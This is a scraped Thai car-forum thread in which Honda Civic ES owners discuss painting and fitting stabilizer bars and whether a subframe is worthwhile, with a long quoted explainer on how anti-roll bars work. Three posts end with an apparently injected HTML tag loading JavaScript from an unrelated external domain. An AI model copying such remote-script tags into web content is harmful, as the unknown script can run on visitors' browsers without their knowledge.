ตอบ
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 17 กรกฎา 2010 22:53 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
Hellbz พิมพ์ว่า:
ขอวิธีทำสีเหล็กกันโคลงหน่อยครับ

ใช้สีอะไรทำอ่ะครับ


ผมเอาสีกระป๋องธรรมดานี่แหละครับ เอากระดาษทราบลูบๆนิดหน่อย แล้วลงรองพื้น แล้วก็จัดสีตามต้องการเลย


pom_sawas พิมพ์ว่า:
benzd พิมพ์ว่า:
แล้วถ้ากันโคลงหน้าใหญ่ จะมีปัญหาอะไรไหมครับ

อยากรู้ด้วยคนคับ


ถ้ารถขับหน้า แบบ ES เหล็กกันโคลงหน้าใหญ่ ไม่มีปัญหาใดๆครับ ดีด้วยซ้ำครับ
ได้รับคำขอบคุณจาก: benzd  kittidech  pom_sawas  tigerchamp  john  Hellbz  TUNG11 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 29 กรกฎา 2010 09:20 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
เพิ่มรูปตอนติดตั้งเสร็จนะครับ

ขอบคุณ ท่านอิท ซีเมน ที่ถ่ายให้


Attached File :
*~ แชร์ประสบการณ์ เหล็กกันโคลง
ได้รับคำขอบคุณจาก: kittidech  benzd  lkki5  tokykung  kim_possible  8800Gold  jonatan  honeybeex7  john  Phetcharat  TUNG11  nismo 
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 29 กรกฎา 2010 21:38 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
สุดยอดๆ
ได้รับคำขอบคุณจาก: hacker 
golfband


เข้าร่วม: 25 มกรา 2009
ตอบ: 160

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 75
ให้คำขอบคุณ: 170

ที่อยู่: chonburi
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 30 กรกฎา 2010 14:24 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ได้รับคำขอบคุณจาก: hacker  john 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
ศุกร์, 30 กรกฎา 2010 15:37 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
สวยมากครับ ถ้าใส่ซับเฟรมอีกสักชิ้น คงจะสุด....นะครับเซียนจ๊อบ
ท่าทาง....ต้องหากันโคลงหลังมาพ่นสีคู่กับ K-sport เสียแล้ว
ได้รับคำขอบคุณจาก: hacker  john 
DRINK


เข้าร่วม: 04 ตุลา 2008
ตอบ: 3856

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

ที่อยู่: Paris + Bangkok + Uttaradit + Phitsanulok
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 30 กรกฎา 2010 15:46 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
สวยดี
ได้รับคำขอบคุณจาก: hacker  john 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 8 กันยา 2010 10:13 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
เพิ่มรูป ซัพเฟรมจากฝั่ง เมกา


Attached File :
*~ แชร์ประสบการณ์ เหล็กกันโคลง
ได้รับคำขอบคุณจาก: kim_possible  tokykung  8800Gold  etabb  lkki5  kieng  jonatan  kittidech  soda_get  tigerchamp  yoosabai  honeybeex7  john  Phetcharat  TUNG11  nismo 
max_x


เข้าร่วม: 16 ธันวา 2009
ตอบ: 679

Guru ES
Guru ES

ได้รับคำขอบคุณ: 443
ให้คำขอบคุณ: 405
พุธ, 8 กันยา 2010 11:17 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ซับเฟรมจัดมาเท่าไหร่เหรอคับ แล้วหาได้จากที่ไหนคับ รบกวนด้วคับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: hacker  john 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
พุธ, 8 กันยา 2010 11:49 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ซับเฟรมสวยมากครับ...ดูแข็งแรง
ได้รับคำขอบคุณจาก: hacker  john 
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 9 กันยา 2010 13:06 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ตอบ สุดยอดเลยจ๊อบ
ได้รับคำขอบคุณจาก: hacker  john 
kieng


ชื่อเล่น: เกี๊ยง

เข้าร่วม: 11 มกรา 2009
ตอบ: 343

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1144
ให้คำขอบคุณ: 347

ที่อยู่: New bridge
ปี: 2004
พฤหัส, 9 กันยา 2010 21:21 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
สวย หว่ะ
ได้รับคำขอบคุณจาก: hacker  john 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 10 กันยา 2010 09:08 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ว่าจะเอา สติ๊กเกอร์ พรเทพโช้คอัพ มาแปะ ที่ซัฟเฟรม
ได้รับคำขอบคุณจาก: tigerchamp  john 
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 10 กันยา 2010 09:33 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
อยากจะจัดมั่งอ่ะ ไม่มีทั้งหน้าหลังเลยรถผม
เซเป็นงู เลยอ่ะ ถามนิดคับ ท่านจ๊อป ซับเฟรมมีประโยชน์ยังงัยอ่ะ
แค่กันโคลงใหญ่ๆ ค้ำล่าง ปีกนกอลูมิเนียม แค่นี้ก็น่าจะพออยู่น่ะคับ ผมไม่รู้จริงๆ
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: hacker  john 
arsenal


ชื่อเล่น: ไม้

เข้าร่วม: 06 กรกฎา 2010
ตอบ: 3035

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2300
ให้คำขอบคุณ: 4312

ที่อยู่: เพชรบุรี หัวหิน ประจวบ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 10 กันยา 2010 09:51 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
เก็บข้อมูลหน่อยยย
ได้รับคำขอบคุณจาก: hacker  john 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 10 กันยา 2010 09:57 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ประโยชน์จริงๆก็คือ ลดภาระการดึงเนื่องจากกันโคลงที่แข็งขึ้น ซัฟเฟรมจะกระจายแรงไปทั้งแผ่นทำให้ตัวถังไม่รับภาระมาก

แต่.... เนื่องจากตัวถังล่างความหนา ES เท่ากับ DC5 และ EP3 ทำให้กันโคลงที่ใส่ไป ตัวถังสามารถรับได้

จึง.... จะใส่ก็ได้ หรือ ไม่ใส่ก็ได้ ซึ่งต่างกับตัวถัง EG ที่ใช้กันโคลง EK9 จึงมีอาการฉีกในกรณีโค้งหนักๆ

ดั้งนั้น.... ใส่ซัฟเฟรมใน ES เท่ากับ เปลืองเงินครับ
ได้รับคำขอบคุณจาก: 8800Gold  benzd  tokykung  jonatan  tatumz  max_x  pom_sawas  kittidech  tigerchamp  honeybeex7  john  Phetcharat  nismo  ปัญญากระด้าง 
PongpanG


ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ที่อยู่: รังสิต
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 10 กันยา 2010 11:03 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
555 ตกลงเปลืองเงิน เหรอวะ
ได้รับคำขอบคุณจาก: hacker  john 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
ศุกร์, 10 กันยา 2010 11:34 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
โดยส่วนตัวผมก็ว่าไม่น่าจะได้ประโยชน์มากนัก แต่ไอ้ความสวยมันห้ามใจได้ยากครับ...
ได้รับคำขอบคุณจาก: hacker  toes  john 
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 10 กันยา 2010 14:03 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
สรุปใส่เพื่อความสวยงาม เยี่ยมเลยคับ ขอบคุณ ท่านจ๊อบ อีกครั้ง
สำหรับข้อมูลแน่นๆ ทั้งหมด อิ อิ ได้เวลาของเราแว้ว.......
เดี๋ยวใส่กันโคลงทั้งหมดแล้ว งั้นผมพ่นสีซัพเฟรมที่ติดกับรถดีกว่า อิ อิ แต่ว่าเดี๋ยวไปหาที่ขุดตังค์ก่อน อิ อิ
ได้รับคำขอบคุณจาก: hacker  john 
8800Gold


ชื่อเล่น: เบียร์

เข้าร่วม: 11 พฤษภาคม 2009
ตอบ: 3022

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3733
ให้คำขอบคุณ: 5865

ที่อยู่: Narita
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 10 กันยา 2010 14:28 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
jonatan พิมพ์ว่า:
สรุปใส่เพื่อความสวยงาม เยี่ยมเลยคับ ขอบคุณ ท่านจ๊อบ อีกครั้ง
สำหรับข้อมูลแน่นๆ ทั้งหมด อิ อิ ได้เวลาของเราแว้ว.......
เดี๋ยวใส่กันโคลงทั้งหมดแล้ว งั้นผมพ่นสีซัพเฟรมที่ติดกับรถดีกว่า อิ อิ แต่ว่าเดี๋ยวไปหาที่ขุดตังค์ก่อน อิ อิ


ไปขุดด้วยจิครับคุงโจ
ได้รับคำขอบคุณจาก: hacker  john 
tatumz


เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

ที่อยู่: 69
ปี: 2003
ศุกร์, 10 กันยา 2010 14:34 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
hacker พิมพ์ว่า:
ประโยชน์จริงๆก็คือ ลดภาระการดึงเนื่องจากกันโคลงที่แข็งขึ้น ซัฟเฟรมจะกระจายแรงไปทั้งแผ่นทำให้ตัวถังไม่รับภาระมาก

แต่.... เนื่องจากตัวถังล่างความหนา ES เท่ากับ DC5 และ EP3 ทำให้กันโคลงที่ใส่ไป ตัวถังสามารถรับได้

จึง.... จะใส่ก็ได้ หรือ ไม่ใส่ก็ได้ ซึ่งต่างกับตัวถัง EG ที่ใช้กันโคลง EK9 จึงมีอาการฉีกในกรณีโค้งหนักๆ

ดั้งนั้น.... ใส่ซัฟเฟรมใน ES เท่ากับ เปลืองเงินครับ



ข้อมูลมาอีกแล้ว ขอบคุณครับ
ได้รับคำขอบคุณจาก: hacker  john 
max_x


เข้าร่วม: 16 ธันวา 2009
ตอบ: 679

Guru ES
Guru ES

ได้รับคำขอบคุณ: 443
ให้คำขอบคุณ: 405
ศุกร์, 10 กันยา 2010 15:09 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
งั้นไม่หามาใส่และ จบ
ได้รับคำขอบคุณจาก: hacker  john 
pairach_c


ชื่อเล่น: ต๋อย

เข้าร่วม: 12 พฤษภาคม 2010
ตอบ: 213

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 348
ให้คำขอบคุณ: 354

ที่อยู่: เชียงใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 2 ตุลา 2010 02:21 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
hacker พิมพ์ว่า:
เพิ่มรูป ซัพเฟรมจากฝั่ง เมกา


รถผม EXI 04 ดูแล้วไม่มีรูยึดเหล็กกันโครง ถ้าจะใส่ต้องเจาะใช่หรือเปล่าครับ
ได้รับคำขอบคุณจาก: hacker  john 
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 2 ตุลา 2010 10:14 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ถามกูรู ES คับผม
มีสมาชิกในคลับ ใจดีคับ
ให้กันโคลงฟรีๆทั้งหน้าและหลัง เดิมๆ
ที่จะให้มี ปะกับ และก็เหล็ก ลูกหมากไม่มีอ่ะคับ
แต่เป็นของ ตัว 2.0 ปี 03 อ่ะคับ รถผมเป็น EXI ไม่มีทั้งหน้าและหลังเลย
จะใส่ด้วยกันได้ป่ะคับ เห็นว่าหลังใส่ได้ แต่ด้านหน้าติดแคตฯ ต้องย้ายแคตฯ จริงเท็จยังงัย รบกวนด้วยคับผม ขอบคุณคับ
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: hacker  tigerchamp  john 
PongpanG


ชื่อเล่น: ป๋องแป๋ง

เข้าร่วม: 11 สิงหา 2008
ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ที่อยู่: รังสิต
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 2 ตุลา 2010 12:11 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ด้านหน้า เนื่องจาก ระบบไอเสีย จะ เดินไม่ตรงกัน อาจจะติดนะครับ คุณ โจ

น่าจะ เหมือน เอาของสตรีมมาใส่อ่ะครับ พี่โอ๋ แกใส่มาแล้ว แต่ เนื่องจากรถพี่โอ๋ เคาะ หลบ ได้ครับ ไม่งั้น มันตี กับเหล็ก กึกๆๆ

ตอนนี้พี่โอ๋ คิดว่า คงเอาแคตออกไปแล้วน่ะครับ ไม่แน่ใจ และหลบ เหล็ก ด้วยครับ
ได้รับคำขอบคุณจาก: hacker  tigerchamp  john 
LADDER 49


เข้าร่วม: 25 กุมภา 2010
ตอบ: 47

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 126
ให้คำขอบคุณ: 9
อาทิตย์, 3 ตุลา 2010 19:15 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
hacker พิมพ์ว่า:
ความเดิม ...

ไปร้านพี่ใหม่เมื่อหลายเดือนก่อน มองดู Subaru มีเหล็กกันโคลงของ STi สีชมพู

พอดีว่าไปกับ บิคิ เนื่องจากไม่มีอะไรทำเลยถอดเหล็กกันโคลงของ ES04 กับของ DC5 ออกมา

ทำสี "ชมพูคิดตี้" กัน ตอนถอดออกมาแอบสังเกตุแล้วว่า ทำไมของ DC5 มันใหญ่กว่าของ ES ตั้งเยอะ

แถมยังหนักกว่าอีก แล้วตอนนั้นยังมีคนเอาเหล็กกันโคลงตรงรุ่น ES ของฝั่งเมกามาขาย(ขอไม่เอ่ยนาม)

เปิดราคามา "แพงเว่อร์ๆ " 8000 บาท เลยไม่ค่อยได้สนใจอะไรกับมันมาก คิดว่า ของรถเราก็มีอยู่แล้ว

--------------------------------------------------------------------------

หลังจากนั้นซักพัก อยากลองของ อยากเปลี่ยนฟิวส์การขับรถ เลยไปหยิบยืม Tain type Flex

มาลองใช้งานเนื่องจาก SS ที่ใช้อยู่ก็มีคนบ้าพลังไปปรับเป็นเบอร์ 0-0 ให้ผมใช้จนชินไปแล้ว

แต่ก็ไม่ค่อยประทับใจกับ Flex เท่าไหร่ เลยจบโปรเจคกับช่วงล่างไปพักหนึ่ง


---------------------------------------------------------------------------

จนมาเจอกระทู้ของพี่ โอ๋ ไซโครซิส เรื่องเหล็กกันโคลง Stream เลยขุดเอาโปรเจคนี้มาลองอีกครั้ง

แล้วก็ได้สอบถามทางพี่ป๋องไว้บ้างแล้ว เลยจัดแจงโหลๆของคุณเม่นให้ช่วยจัดของให้

ยังไม่ทันหมุนเงินเลย คุณเม่นโหลๆมาว่า มีของแล้ว เลยจัดการลองซะหน่อย


---------------------------------------------------------------------------

อันนี้งูเขียวลงไว้
iMan พิมพ์ว่า:
*~ แชร์ประสบการณ์ เหล็กกันโคลง *~ แชร์ประสบการณ์ เหล็กกันโคลง

เกิดอะไรขึ้น..ขณะรถเลี้ยว

เป็นคำถามที่ตอบได้อย่างง่ายๆ เมื่อรถเลี้ยวตัวถังก็ต้องเอียง จะเอียงไปทางไหนก็ต้องขึ้นอยู่กับทิศทางการเลี้ยว ถ้ารถเข้า "โค้งขวา" ตัวถังข้างซ้ายจะยุบ ขณะที่ตัวถังข้างขวาจะยก ขณะเดียวกันถ้ารถเข้า "โค้งซ้าย" ตัวถังข้างขวาจะยุบและตัวถังด้านซ้ายจะยก อาการที่เกิดขึ้นทั้ง "ยก" และ "ยุบ" จะมากหรือน้อยก็ขึ้นอยู่กับรัศมีความโค้งของถนน มุมเอียงขึ้นรับกับโค้งของถนน องศาการหักเลี้ยวของพวงมาลัย และความเร็วในการเข้าโค้ง ซึ่งการ "เอียง" ของตัวถังจะส่งผลต่อเสถียรภาพในการทรงตัวของรถโดยตรง ถ้ารถเอียงมากเกินความพอดีอาจเลยเถิดไปถึงขั้นพลิกคว่ำได้ แต่นั่นไม่ใช่ปัญหาสำหรับรถยนต์ในปัจจุบัน เพราะวิศวกรฝรั่งรุ่นคุณปู่ คุณทวด เค้าคิดเรื่องนี้ "จบ" ไปเป็นร้อยปีแล้ว ยุคนี้คิดเพียงแต่ว่าจะนำทฤษฎีเหล่านี้มาประยุกต์ใช้งานต่ออย่างไรให้สมบูรณ์แบบมากที่สุด
เมื่อเรามองถึงอาการ "เอียง" ของรถในโค้งก็เริ่มสงสัยว่าเพื่อนร่วมสถาบันช่วงล่างอย่าง "สปริง" และ"โช้คอัพ" ไม่ได้มีส่วนช่วยในเรื่องนี้เลยหรือ? ถ้าจะบอกว่ามีส่วนก็พอมีอยู่บ้าง แต่ไม่ได้มากอะไร เพราะไม่ใช่หน้าที่หลักของมัน สปริงมีหน้าที่ดูดซับอาการสั่นสะเทือน ส่วนโช้คอัพรับหน้าที่หน่วง หรือหยุดอาการเต้นของสปริง ในรถยนต์โช้คอัพต้องทำงานควบคู่กับสปริงเสมอ เพราะฉะนั้นลำพังภาระที่สปริงและโช้คอัพแบกรับไว้ก็มากโขอยู่แล้ว วิศวกรจึงได้เพิ่ม "เหล็กกันโคลง" หรือ Stabilizer Bar เข้ามาเป็นส่วนประกอบหลักชิ้นสำคัญในระบบกันสะเทือน รับหน้าที่ต่อต้านการเอียงของรถโดยเฉพาะ

*~ แชร์ประสบการณ์ เหล็กกันโคลง

ความเป็น "สปริง" ในเหล็ก

คุณสมบัติความเป็นสปริงในเหล็ก (บางประเภท) จะแสดงออกมาให้เราเห็น ก็ขึ้นอยู่กับว่านำเหล็กชนิดนั้นมาขึ้นรูปเป็นอะไร ถ้านำมาขึ้นรูปเป็นเหล็กเส้น แล้วขดเป็นทรงกระบอก ก็จะเป็นคอยล์สปริง หรือสปริงขดที่เรารู้จักมักคุ้นกันเป็นพิเศษ นอกจากนี้ยังมี "เหล็กสปริง" รูปแบบอื่นๆ อีก อย่างเช่น ช่วงล่างด้านหน้าของรถกระบะหลายเจ้าในบ้านเรา จะเป็นแบบ "ทอร์ชั่นบาร์" หรือ "เหล็กบิด" ทำงานร่วมกับปีกนกและโช้คอัพ โดยไม่มีสปริงขดให้เห็น

สำหรับรถเก๋งขนาดเล็กของหลายค่าย ช่วงล่างด้านหลังก็นิยมใช้แบบ "ทอร์ชั่นบีม" (หรือ คานบิด) มีเรียกขานให้เราได้ยินกันบ่อยครั้งจนเริ่มคุ้นหู เพราะพื้นฐานการออกแบบช่วงล่างประเภทนี้ไม่ซับซ้อน ใช้เนื้อที่ในการติดตั้งและทำงานน้อย ลงตัวที่สุดแล้วสำหรับรถขนาดเล็ก สปริงรูปแบบเช่นนี้จึงเรียกได้ทั้งเหล็กบิด หรือคานบิด แล้วแต่รูปร่าง แล้วแต่ขนาด หรือบางทีก็แล้วแต่บริษัทรถยนต์จะตั้งชื่อให้ด้วยล่ะ

*~ แชร์ประสบการณ์ เหล็กกันโคลง

การทำงานของเหล็กกันโคลง

เหล็กกันโคลง ทำหน้าที่ลดการโอนเอียงของตัวถังในขณะเลี้ยว ทำด้วย "เหล็กกล้าสปริง" รูปทรงคล้ายๆ ตัว "U" ติดตั้งตามขวางกับตัวรถ ส่วนกลางยึดติดกับโครงรถ 2 จุด โดยผ่านบู๊ชยาง สำหรับช่วงล่างแบบปีกนก ปลายทั้งสองของเหล็กกันโคลงจะยึดติดกับปีกนกล่างของล้อหน้า (หรือหลัง) แต่ละข้าง

ส่วนช่วงล่างแบบแม็คเฟอร์สันสตรัท ปลายของเหล็กกันโคลงแต่ละข้างก็จะมี "ก้านต่อ" เพื่อไปยึดกับกระบอกโช้คอัพของชุดสตรัทด้วยเช่นกัน

ขณะรถเคลื่อนที่ ถ้าตัวถังต่ำลงหรือยกขึ้นในลักษณะที่อยู่ในระดับเดียวกัน อย่างเช่น ล้อหน้า(หรือล้อหลัง) ยกพร้อมๆ กัน หรือยุบตัวพร้อมๆ กัน ยกตัวอย่าง การขับรถข้ามตัวหนอนตามตรอกซอกซอยต่างๆ เหล็กกันโคลงจะไม่ทำงาน เพราะไม่มีการบิดตัวเกิดขึ้น

แต่ในขณะรถเลี้ยว ระดับของตัวถังจะไม่เท่ากัน ข้างหนึ่งสูง อีกข้างหนึ่งต่ำ ปีกนกซ้าย-ขวา ไม่ได้อยู่ในระดับเดียวกัน ปลายของเหล็กกันโคลงของตัวถังข้างที่ยุบจะ "บิดขึ้น" ขณะที่ปลายเหล็กกันโคลงของตัวถังข้างที่ยกจะ "บิดลง" ความเป็นสปริงของเหล็กกันโคลงจะ "รั้ง" ดึงรถให้คืนสู่ระดับปกติอย่างรวดเร็วหลังจากรถเคลื่อนที่ออกจากโค้ง เพื่อรักษาระดับปกติของตัวถัง และมีส่วนทำให้ช่วงล่างสามารถรับมือกับสภาพถนนที่จะเกิดขึ้นข้างหน้าได้อย่างทันท่วงทีนั่นเอง

ลองคิดดูแล้วกันครับ ขณะรถเข้าโค้งตัวถังฝั่งนอกโค้งยุบตัวลง สปริงจะถูกกด ไม่สามารถทำงานได้เต็ม 100% อีกต่อไป แล้วถ้าช่วงเวลาสั้นๆ นั้นเอง ล้อข้างนั้นดันต้องตกหลุมหรือขึ้นเนินอีก จะอันตรายเพียงใด..!?! ดังนั้นการเอียงของตัวถังที่เหมาะสม ในช่วงเวลาที่เหมาะสม จึงมีความสำคัญอย่างยิ่งยวดกับการทรงตัวของรถ

ในการออกแบบระบบกันสะเทือนของรถแต่ละรุ่น ขึ้นอยู่กับรูปแบบการใช้งาน ส่วนประกอบต่างๆ อาทิ แขนยึด (Links) สปริงรูปแบบต่างๆ โช้คอัพ รวมถึงเหล็กกันโคลง ต้องเลือกชุดจับคู่ ให้ทำงานร่วมกันได้อย่างลงตัวตามวัตถุประสงค์ของรถ ขนาดของเหล็กกันโคลงถูกให้ความสำคัญไม่น้อยกว่าส่วนอื่นๆ ขนาดที่ว่าหมายถึง "ขนาดเส้นผ่าศูนย์กลาง" ของท่อนเหล็กกันโคลง ยิ่งใหญ่ ค่า K ยิ่งมาก แข็งมาก แต่ไม่ได้หมายความว่าจะดีเสมอไป อย่างที่กล่าวข้างต้นว่าเหล็กกันโคลงต้องทำงานร่วมกับส่วนประกอบอื่นๆ ของช่วงล่างด้วย

ความแข็งของเหล็กกันโคลงที่ล้อหน้าและหลังไม่จำเป็นต้องเท่ากัน ขนาดก็ไม่จำเป็นต้องเท่ากัน ส่วนนี้ต้องอยู่กับการเซ็ตของวิศวกรเพื่อให้ฟิลลิ่งของรถที่ถ่ายทอดออกมาสมดุลมากที่สุด รถยนต์คันหนึ่งๆ ในขั้นตอนการทดสอบก่อนเข้าสู่ไลน์การผลิตจริง จึงมีช่วงล่างออกมาลองวิ่งกันอยู่หลายชุดมาก (บนพื้นฐานเดิม เช่น เป็นแบบปีกนกเหมือนกัน ต่างกันที่ค่าความแข็งของสปริง ขนาดเหล็กกันโคลง ความหนืดของโช้คอัพ เป็นต้น) ช่วงล่างชุดที่ใช้งานได้ดีในเยอรมัน อาจไม่ดีพอกับสภาพถนนในบ้านเราก็เป็นได้ (ก็ถนนมันพังเป็นหลุมเป็นบ่อนี่จ๊ะ)

คงรู้จักกับเหล็กกันโคลงกันมากขึ้นแล้วนะครับ ฉบับหน้าเราคงต่อเรื่อง Dynamic Drive ได้ง่ายขึ้น ระบบนี้ทำงานด้วยหลักการพื้นฐาน ไม่ซับซ้อนมากนัก ความซับซ้อนอยู่ที่ส่วนควบคุมซึ่งแน่นเอี้ยดไปด้วยวงจรอิเล็กทรอนิกส์ ทั้งหมดก็เพื่อให้ Dynamic Drive สามารถทำงานได้อย่างละเอียด แม่นยำ ฉลาด ลงตัวกับทุกสภาวะการขับขี่มากที่สุด แล้วพบกันเดือนหน้าครับ

คัดลอกมาจาก : www.grandprixgroup.com [/url]


แล้วก็อันนี้ พี่หนุนลงไว้

MrKhanoon พิมพ์ว่า:
เหล็กกันโคลง...ติดตั้งเพื่ออะไร...
เหล็กกันโครงส่วนใหญ่ติดตั้งกับรถขับเคลื่อน 4 ล้อ ทำจากวัสดุเดียวกับที่ใช้ทำแหนบ นั่นคือ เหล็กสปริง เนื่องจากต้องรับแรงสั่นสะเทือนของช่วงล่าง และดูดซับแรงสั่นสะเทือนเหล่านี้ไวบางส่วน เหล็กกันโคลงจะมีปลายทั้ง 2 ด้านเป็นเดือยเกลียว ต่อเข้ากับแขนปีกนกตัวล่างทั้งซ้ายและขวา
